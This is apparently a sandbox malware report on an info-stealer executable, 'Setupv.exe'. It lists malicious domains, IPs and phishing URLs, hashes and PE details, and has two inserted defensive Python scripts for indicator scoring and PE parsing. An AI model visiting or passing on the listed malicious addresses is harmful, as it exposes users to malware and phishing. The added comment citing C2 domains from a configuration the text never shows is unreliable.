23.52.218.12 | steamcommunity.com | United States | 27747 | TelecentroSAAR | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1676533
Start date and time: 2025-04-28 19:33:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setupv.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 37
• Number of non-executed functions: 72
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
13:34:51 | API Interceptor | 7x Sleep call for process: Setupv.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
104.21.36.133 | wextract-gen.EXE.exe | malicious | Amadey, LummaC Stealer, Vidar
104.21.36.133 | FrRLbLZMuB.exe | malicious | LummaC Stealer
104.21.36.133 | 8tXTOlPbMn.exe | malicious | LummaC Stealer
104.21.36.133 | 8cyhcAt5qW.exe | malicious | LummaC Stealer
23.52.218.12 | FrRLbLZMuB.exe | malicious | LummaC Stealer
23.52.218.12 | Pl6q6O7NqM.exe | malicious | Amadey, LummaC Stealer
23.52.218.12 | 8tXTOlPbMn.exe | malicious | LummaC Stealer
23.52.218.12 | 8cyhcAt5qW.exe | malicious | LummaC Stealer
23.52.218.12 | 250428-heb9faxqw7.bin.exe | malicious | Unknown
23.52.218.12 | stage6.exe | malicious | LummaC, PureLog Stealer, zgRAT
23.52.218.12 | random.exe | malicious | Amadey, LummaC Stealer, RHADAMANTHYS
23.52.218.12 | random.exe | malicious | LummaC Stealer
23.52.218.12 | random.exe | malicious | LummaC Stealer
23.52.218.12 | random.exe | malicious | LummaC Stealer
Match | Associated Sample Name / URL | Detection | Threat Name | Context
toptalentw.top | wextract-gen.EXE.exe | malicious | Amadey, LummaC Stealer, Vidar | 104.21.36.133
toptalentw.top | FrRLbLZMuB.exe | malicious | LummaC Stealer | 104.21.36.133
toptalentw.top | Pl6q6O7NqM.exe | malicious | Amadey, LummaC Stealer | 172.67.194.111
toptalentw.top | 8tXTOlPbMn.exe | malicious | LummaC Stealer | 104.21.36.133
toptalentw.top | 8cyhcAt5qW.exe | malicious | LummaC Stealer | 104.21.36.133
steamcommunity.com | wextract-gen.EXE.exe | malicious | Amadey, LummaC Stealer, Vidar | 23.222.161.105
steamcommunity.com | FrRLbLZMuB.exe | malicious | LummaC Stealer | 23.52.218.12
steamcommunity.com | Pl6q6O7NqM.exe | malicious | Amadey, LummaC Stealer | 23.52.218.12
steamcommunity.com | 8tXTOlPbMn.exe | malicious | LummaC Stealer | 23.52.218.12
steamcommunity.com | 8cyhcAt5qW.exe | malicious | LummaC Stealer | 23.52.218.12
steamcommunity.com | 250428-heb9faxqw7.bin.exe | malicious | Unknown | 23.222.161.105
steamcommunity.com | 250428-heb9faxqw7.bin.exe | malicious | Unknown | 23.52.218.12
steamcommunity.com | 250427-3trynatzcx.bin.exe | malicious | LummaC Stealer | 23.51.204.111
steamcommunity.com | random.exe | malicious | Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer, RedLine, Xmrig | 23.52.218.12
steamcommunity.com | random.exe | malicious | Amadey, CryptOne, LummaC Stealer | 23.222.161.105
pki-goog.l.google.com | keylogger.exe | malicious | Unknown | 142.250.72.131
pki-goog.l.google.com | dr.ps1 | malicious | LummaC Stealer | 192.178.49.195
pki-goog.l.google.com | text.bat.exe | malicious | MyDoom | 192.178.49.195
pki-goog.l.google.com | PO9765.js | malicious | Unknown | 192.178.49.195
pki-goog.l.google.com | Tapflo Group.VBS.vbs | malicious | XWorm | 192.178.49.195
pki-goog.l.google.com | PO-0427-26 - 150-30.js | malicious | FormBook | 192.178.49.195
pki-goog.l.google.com | Shipping Documents SI 694_pdf.js | malicious | MSIL Logger, MassLogger RAT | 192.178.49.195
pki-goog.l.google.com | 0.vbs | malicious | Remcos | 192.178.49.195
pki-goog.l.google.com | hyirn.hta | malicious | Unknown | 192.178.49.195
pki-goog.l.google.com | iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbs | malicious | Remcos | 192.178.49.195
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TelecentroSAAR | FW_ Final Reminder Before Maintenance Day From Proofpoint, Inc.eml | malicious | Unknown | 23.52.214.123
TelecentroSAAR | FrRLbLZMuB.exe | malicious | LummaC Stealer | 23.52.218.12
TelecentroSAAR | Pl6q6O7NqM.exe | malicious | Amadey, LummaC Stealer | 23.52.218.12
TelecentroSAAR | 8tXTOlPbMn.exe | malicious | LummaC Stealer | 23.52.218.12
TelecentroSAAR | 8cyhcAt5qW.exe | malicious | LummaC Stealer | 23.52.218.12
TelecentroSAAR | 250428-heb9faxqw7.bin.exe | malicious | Unknown | 23.52.218.12
TelecentroSAAR | stage6.exe | malicious | LummaC, PureLog Stealer, zgRAT | 23.52.218.12
TelecentroSAAR | https://voiceoversecure.divineblizzsystems.com&d=DwMGaQ | malicious | Unknown | 23.52.210.234
TelecentroSAAR | random.exe | malicious | Amadey, LummaC Stealer, RHADAMANTHYS | 23.52.218.12
TelecentroSAAR | random.exe | malicious | LummaC Stealer | 23.52.218.12
CLOUDFLARENETUS | http://sharesmorefileson.com | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 172.67.151.194
CLOUDFLARENETUS | http://okvipbank.me | malicious | Unknown | 104.21.43.112
CLOUDFLARENETUS | Adblock360-Setup_2.1.0.0053.msi | malicious | Coinhive, Xmrig | 172.64.41.3
CLOUDFLARENETUS | wextract-gen.EXE.exe | malicious | Amadey, LummaC Stealer, Vidar | 104.21.36.133
CLOUDFLARENETUS | rawb_invoice_bl.vbs | malicious | Remcos, AsyncRAT | 104.21.80.1
CLOUDFLARENETUS | http://sprayfoamsys.com | malicious | Unknown | 104.21.35.145
CLOUDFLARENETUS | https://vault.nimbox.co.uk/shares/file/78LUoWVICRC/ | malicious | Unknown | 104.21.36.106
CLOUDFLARENETUS | https://keap.app/contact-us/2539027575244025 | malicious | Invisible JS, Tycoon2FA | 104.21.7.201
CLOUDFLARENETUS | z82CVDanielaRominaMelgarejo.exe | malicious | Snake Keylogger | 104.21.48.1
CLOUDFLARENETUS | http://euwlqywwavef2ttqpckz.dcovykq.es/slEF6jCs2KZ/#sample@domain.com | malicious | HTMLPhisher | 1.1.1.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | wextract-gen.EXE.exe | malicious | Amadey, LummaC Stealer, Vidar | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | dr.ps1 | malicious | LummaC Stealer | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | #U041f#U0430#U0440#U043e#U043b#U044c.js (Пароль.js, i.e. "Password.js") | malicious | RMSRemoteAdmin | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | Scanned-Doc-t00778886867-QUO.LNK.lnk | malicious | Remcos, DBatLoader | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | Tapflo Group.VBS.vbs | malicious | XWorm | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | Shipping Documents SI 694_pdf.js | malicious | MSIL Logger, MassLogger RAT | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | Order Request No. E0147-1-T1911.xlam.xlsx | malicious | Unknown | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | AWB 210229572045.docx.doc | malicious | Unknown | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | iiii Drawings_Tender No. UAE-UCPC-4389761110-2025.vbs | malicious | Remcos | 104.21.36.133, 172.67.182.68, 23.52.218.12
a0e9f5d64349fb13191bc781f81f42e1 | FrRLbLZMuB.exe | malicious | LummaC Stealer | 104.21.36.133, 172.67.182.68, 23.52.218.12
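The context tables above show the sample's network indicators (the IP 192.178.49.195, the addresses listed under the TelecentroSAAR and CLOUDFLARENETUS matches, and the 32-character TLS client fingerprint a0e9f5d64349fb13191bc781f81f42e1) matched against samples from unrelated families such as XWorm, FormBook, Remcos, Amadey and RMSRemoteAdmin, not only LummaC. A client fingerprint of that kind identifies the TLS stack the sample uses rather than the malware, and CDN or shared-hosting addresses are reused by many tenants, so these are weak pivots on their own. The script below is an added example, not part of this report or of Joe Sandbox: it scores each indicator by the number of distinct families it has been seen with. ROWS is transcribed from the tables above (a subset) plus one constructed control row at 198.51.100.7; the alias map folding "LummaC" into "LummaC Stealer", the threshold of one family and the function names are assumptions made for illustration.

```python
"""
Indicator fidelity over the "similar samples" context tables.

Added example, not part of the Joe Sandbox report: ROWS is transcribed from
the context tables in the report (a subset) plus one constructed control
row; the alias map, the family threshold and the function names are
assumptions made for illustration.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Set


class ContextRow(NamedTuple):
    indicator: str   # shared IP, ASN label or TLS client fingerprint
    kind: str        # "ip", "asn" or "ja3"
    sample: str      # "Associated Sample Name / URL" column
    threats: str     # "Threat Name" column as printed, comma separated


ROWS: List[ContextRow] = [
    # IP context rows (transcribed from the report's tables)
    ContextRow("192.178.49.195", "ip", "PO9765.js", "Unknown"),
    ContextRow("192.178.49.195", "ip", "Tapflo Group.VBS.vbs", "XWorm"),
    ContextRow("192.178.49.195", "ip", "PO-0427-26 - 150-30.js", "FormBook"),
    ContextRow("192.178.49.195", "ip", "Shipping Documents SI 694_pdf.js",
               "MSIL Logger, MassLogger RAT"),
    ContextRow("192.178.49.195", "ip", "0.vbs", "Remcos"),
    # ASN context rows (the Context column is the matching IP)
    ContextRow("23.52.218.12", "asn", "FrRLbLZMuB.exe", "LummaC Stealer"),
    ContextRow("23.52.218.12", "asn", "Pl6q6O7NqM.exe", "Amadey, LummaC Stealer"),
    ContextRow("23.52.218.12", "asn", "stage6.exe", "LummaC, PureLog Stealer, zgRAT"),
    ContextRow("23.52.218.12", "asn", "random.exe", "Amadey, LummaC Stealer, RHADAMANTHYS"),
    # Fingerprint context rows
    ContextRow("a0e9f5d64349fb13191bc781f81f42e1", "ja3", "dr.ps1", "LummaC Stealer"),
    ContextRow("a0e9f5d64349fb13191bc781f81f42e1", "ja3",
               "#U041f#U0430#U0440#U043e#U043b#U044c.js", "RMSRemoteAdmin"),
    ContextRow("a0e9f5d64349fb13191bc781f81f42e1", "ja3",
               "Scanned-Doc-t00778886867-QUO.LNK.lnk", "Remcos, DBatLoader"),
    ContextRow("a0e9f5d64349fb13191bc781f81f42e1", "ja3", "Tapflo Group.VBS.vbs", "XWorm"),
    ContextRow("a0e9f5d64349fb13191bc781f81f42e1", "ja3", "AWB 210229572045.docx.doc", "Unknown"),
    # Constructed control row: a TEST-NET-2 address seen with a single family only.
    ContextRow("198.51.100.7", "ip", "constructed-control.exe", "LummaC Stealer"),
]

# Assumption: the tables print one family under two labels; fold them together.
ALIASES = {"LummaC": "LummaC Stealer"}


def parse_threats(threats: str) -> Set[str]:
    """Split the Threat Name column into normalised family names.
    'Unknown' is the absence of a label, not a family, so it is dropped."""
    families = set()
    for name in threats.split(","):
        name = name.strip()
        if name and name != "Unknown":
            families.add(ALIASES.get(name, name))
    return families


def families_per_indicator(rows: Iterable[ContextRow]) -> Dict[str, Set[str]]:
    """Union of the families each indicator has been observed with."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for row in rows:
        seen[row.indicator] |= parse_threats(row.threats)
    return dict(seen)


def classify(rows: Iterable[ContextRow], max_families: int = 1) -> Dict[str, str]:
    """'low' when an indicator is shared by more than max_families distinct
    families (shared hosting / common client stack), otherwise 'usable'."""
    return {ind: ("low" if len(fams) > max_families else "usable")
            for ind, fams in families_per_indicator(rows).items()}


def report(rows: Iterable[ContextRow]) -> List[str]:
    """One line per indicator, suitable for an analyst note."""
    rows = list(rows)
    fams, verdict = families_per_indicator(rows), classify(rows)
    return [f"{ind}: {verdict[ind]} ({len(fams[ind])} families: {', '.join(sorted(fams[ind]))})"
            for ind in sorted(fams)]


if __name__ == "__main__":
    print("\n".join(report(ROWS)))
```

Running it marks every indicator taken from the tables as low fidelity and only the constructed control address as usable; for this sample the C2 domains in the extracted configuration are the indicators worth blocking, while the CDN addresses and the client fingerprint belong in a hunting query at most.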
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No created / dropped files found
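The static file information below lists fields that can be recomputed from the raw file: the PE32 file type, the 8-bit entropy, the entry point (given as a virtual address), the section that contains it, the image base and the subsystem. The "MZP" magic and the "This program must be run under Win32" message in the content preview are the DOS stub written by the Borland/Delphi linker; a parser only needs e_lfanew from that stub. The following script is an added example, not code from the report or from Joe Sandbox. It walks the DOS header, PE signature, COFF header, optional header and section table, and adds per-section entropy, which is the check an analyst runs to see whether a high whole-file entropy (7.09 here) comes from one packed or encrypted section. build_stub_pe() returns a constructed PE32 stub whose entry point and image base mirror the values reported for Setupv.exe so the output is recognisable; it is not the sample itself, and its section names, sizes and contents are assumptions.

```python
"""
Recompute the static PE fields listed in this report (file type, 8-bit
entropy, entry point, entry-point section, image base, subsystem) from a
raw file. Added example, not code from the report or from Joe Sandbox;
build_stub_pe() returns a constructed PE32 stub used only to exercise the
parser, not the analysed sample.
"""
import math
import struct
from collections import Counter
from typing import Dict, List, Tuple

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
IMAGE_SUBSYSTEM = {1: "native", 2: "windows gui", 3: "windows cui"}
SECTION_HDR = "<8sIIIIIIHHI"   # 40-byte IMAGE_SECTION_HEADER

# name, VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData
Section = Tuple[str, int, int, int, int]


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for constant data, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data: bytes) -> Dict[str, object]:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:                   # 32-bit layout: BaseOfData at +24, ImageBase at +28
        kind, image_base = "PE32", struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS_MAGIC:             # 64-bit layout: 8-byte ImageBase at +24
        kind, image_base = "PE32+", struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum, subsystem = struct.unpack_from("<IH", data, opt + 64)   # CheckSum at +64, Subsystem at +68
    sections: List[Section] = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr, *_ = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize or rawsize, rawptr, rawsize))
    # The entry-point section is the one whose virtual range contains the entry RVA.
    entry_section = next((s[0] for s in sections if s[1] <= entry_rva < s[1] + s[2]), None)
    return {
        "type": kind,
        "machine": machine,
        "entry_point": image_base + entry_rva,   # a VA, like the report's "Entrypoint:0x..."
        "entry_section": entry_section,
        "image_base": image_base,
        "subsystem": IMAGE_SUBSYSTEM.get(subsystem, f"unknown ({subsystem})"),
        "checksum": checksum,
        "entropy": shannon_entropy(data),
        "sections": sections,
    }


def section_entropies(data: bytes, info: Dict[str, object]) -> Dict[str, float]:
    """Entropy of each section's raw bytes; a section near 8.0 usually holds a packed or encrypted payload."""
    return {name: shannon_entropy(data[ptr:ptr + size]) for name, _va, _vs, ptr, size in info["sections"]}


def build_stub_pe() -> bytes:
    """Constructed PE32 stub (not the analysed sample): entry point and image
    base mirror the report so parse_pe() output is recognisable."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)  # i386, 2 sections, 224-byte optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x21CC)                          # AddressOfEntryPoint (RVA)
    struct.pack_into("<III", opt, 20, 0x1000, 0x3000, 0x400000)      # BaseOfCode, BaseOfData, ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                  # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x4000, 0x200)                  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                               # IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    text_hdr = struct.pack(SECTION_HDR, b".text\0\0\0", 0x2000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    data_hdr = struct.pack(SECTION_HDR, b".data\0\0\0", 0x1000, 0x3000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text_hdr + data_hdr).ljust(0x200, b"\0")
    text = bytes(range(256)) * 2     # 0x200 bytes, uniform -> entropy 8.0 (looks "packed")
    data = b"\0" * 0x200             # 0x200 bytes, constant -> entropy 0.0
    return headers + text + data


if __name__ == "__main__":
    image = build_stub_pe()
    info = parse_pe(image)
    print(info["type"], hex(info["entry_point"]), info["entry_section"],
          hex(info["image_base"]), info["subsystem"], round(info["entropy"], 3))
    print("section entropy:", section_entropies(image, info))
```

To run it on the real file replace build_stub_pe() with open("Setupv.exe", "rb").read(); the parsed entry point, image base and subsystem should then match the values printed in the report, and the per-section entropies show where the 7.09 whole-file figure comes from.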
                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.085555487437187
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
File name:Setupv.exe
File size:5'298'048 bytes
MD5:a88651093c94d9006da8ccbc80535e29
SHA1:31208c84dd3066d4d0449c588e1614485156845e
SHA256:fc9adba0c5b7ac7700a7e904aecfffb41a53c9311f249dcbf5678707d10db7ea
SHA512:429ac4fafa5b4cab9b878fd4a5b948396190249cd7ee12e47c43fa92db493f40a2f6f9c7f63402f96c8157b0c9a8460bd327c485a28c3cf169c851f148725c0e
SSDEEP:49152:J6P0t/mKL0CzTjrqDXgCTsezKafdlLdIcvakldp18+MCttplBzm8dvHO8KiRmXx2:cPkOvBvR6RzvQh8FT56FoliU5tRx4V
TLSH:9E36AF617246943BD1AB2B3A153FBA60953DBB586912C947A3F00C4C9F765813B2F38F
File Content Preview:MZP.....................@......Pjr......................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash:124dccccccccc686
Entrypoint:0x4021cc
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:0x654CAD79 [Thu Nov 9 09:59:21 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:68eed7d94eea7cf7296e2d2b6f51737b
Signature Valid:false
Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 10/01/2022 01:00:00 10/01/2025 00:59:59
Subject Chain
• CN=DOS SANTOS DA SILVA ALFREDO, O=DOS SANTOS DA SILVA ALFREDO, S=Occitanie, C=FR, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=FR, SERIALNUMBER=789 849 163 00025
Version:3
Thumbprint MD5:969883F5E1C9A0AFDC8ECA5778CD455E
Thumbprint SHA-1:0FFC830BD50362A6993425B973EFEA97BC8AEB0E
Thumbprint SHA-256:BB48064FA3A2272DD3B18C9D330293C867964D2880520CFA45ABEA00BE80BB9F
Serial:009EB86320BC00ABF185BBDE0332C26F58
Instruction
jmp 00007FEB68DEFE62h
bound di, dword ptr [edx]
inc ebx
sub ebp, dword ptr [ebx]
dec eax
dec edi
dec edi
dec ebx
nop
jmp 00007FEB6952FF01h
mov eax, dword ptr [0074009Fh]
shl eax, 02h
mov dword ptr [007400A3h], eax
push edx
push 00000000h
call 00007FEB6912C376h
mov edx, eax
call 00007FEB6911C69Bh
pop edx
call 00007FEB6911C5BDh
call 00007FEB6911C7ECh
push 00000000h
call 00007FEB6911E535h
pop ecx
push 00740048h
push 00000000h
call 00007FEB6912C350h
mov dword ptr [007400A7h], eax
push 00000000h
jmp 00007FEB69127B68h
jmp 00007FEB6911E567h
xor eax, eax
mov al, byte ptr [00740091h]
ret
mov eax, dword ptr [007400A7h]
ret
pushad
mov ebx, BCB05000h
push ebx
push 00000BADh
ret
mov ecx, 000000F0h
or ecx, ecx
je 00007FEB68DEFE9Fh
cmp dword ptr [0074009Fh], 00000000h
jnc 00007FEB68DEFE5Ch
mov eax, 000000FEh
call 00007FEB68DEFE2Ch
mov ecx, 000000F0h
push ecx
push 00000008h
call 00007FEB6912C313h
push eax
call 00007FEB6912C3B5h
or eax, eax
jne 00007FEB68DEFE5Ch
mov eax, 000000FDh
call 00007FEB68DEFE0Bh
push eax
push eax
push dword ptr [0074009Fh]
call 00007FEB69127D56h
push dword ptr [0074009Fh]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x3a4000         0x2a5fd       .edata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x39f000         0x3acc        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3cf000         0x9800        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x507c00         0x5b80        .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3d9000         0x423a4       .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x39e000         0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x3a3000         0x9ab         .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text    0x1000           0x33f000      0x33e800  035a02a40aabe062dcfac75ab400611d  unknown   unknown              unknown    unknown             IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data    0x340000         0x5d000       0x3f600   167dfa8df33fb4d2cc3eaa4765ff98cf  False     0.21953202046351084  data       5.606925262276647   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls     0x39d000         0x1000        0x200     bf619eac0cdf3f68d496ea9344137e8b  False     0.02734375           data       0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata   0x39e000         0x1000        0x200     dc9ff986446ed24f1ae9394daf493165  False     0.05078125           data       0.2108262677871819  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.idata   0x39f000         0x4000        0x3c00    54b566ddda943da7c533ee680e5584ad  False     0.31100260416666664  data       5.243391675198522   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didata  0x3a3000         0x1000        0xa00     a945ff51966ce32471a3f240b0071d2b  False     0.3953125            data       4.563216715868903   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata   0x3a4000         0x2b000       0x2a600   d0f6f292a14c0ececce03f369bf2e24a  False     0.21546598451327434  data       5.838964108165409   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc    0x3cf000         0xa000        0x9800    b15d895e6b64f0f78f4e0b39ccfa33b0  False     0.27017372532894735  data       4.4698416088770445  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc   0x3d9000         0x151ba6      0x151000  4f3a6cfc51209cd76fb39fc6a141c5d3  False     0.9298758577522255   data       7.9246221544666025  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x3cfa24 | 0x134 | data | English | United States | 0.43506493506493504
RT_CURSOR | 0x3cfb58 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x3cfc8c | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x3cfdc0 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x3cfef4 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x3d0028 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x3d015c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_CURSOR | 0x3d0290 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_ICON | 0x3d03c4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600, resolution 283464 x 283464 px/m | English | United States | 0.2564315352697095
RT_STRING | 0x3d296c | 0x104 | data | | | 0.38461538461538464
RT_STRING | 0x3d2a70 | 0x440 | data | | | 0.40441176470588236
RT_STRING | 0x3d2eb0 | 0x40c | data | | | 0.34459459459459457
RT_STRING | 0x3d32bc | 0x414 | data | | | 0.3007662835249042
RT_STRING | 0x3d36d0 | 0x374 | data | | | 0.4343891402714932
RT_STRING | 0x3d3a44 | 0x474 | data | | | 0.3929824561403509
RT_STRING | 0x3d3eb8 | 0xc0 | data | | | 0.6041666666666666
RT_STRING | 0x3d3f78 | 0x100 | data | | | 0.57421875
RT_STRING | 0x3d4078 | 0x320 | data | | | 0.40125
RT_STRING | 0x3d4398 | 0x430 | data | | | 0.375
RT_STRING | 0x3d47c8 | 0x41c | data | | | 0.37832699619771865
RT_STRING | 0x3d4be4 | 0x3bc | data | | | 0.35460251046025104
RT_STRING | 0x3d4fa0 | 0x19c | data | | | 0.4344660194174757
RT_STRING | 0x3d513c | 0xec | data | | | 0.5508474576271186
RT_STRING | 0x3d5228 | 0x1f0 | data | | | 0.5100806451612904
RT_STRING | 0x3d5418 | 0x3fc | data | | | 0.36666666666666664
RT_STRING | 0x3d5814 | 0x424 | data | | | 0.34150943396226413
RT_STRING | 0x3d5c38 | 0x2fc | data | | | 0.36649214659685864
RT_STRING | 0x3d5f34 | 0x3c4 | data | | | 0.36410788381742737
RT_STRING | 0x3d62f8 | 0x360 | data | | | 0.3194444444444444
RT_STRING | 0x3d6658 | 0x464 | data | | | 0.40658362989323843
RT_STRING | 0x3d6abc | 0x70c | data | | | 0.33647450110864746
RT_STRING | 0x3d71c8 | 0x49c | data | | | 0.3288135593220339
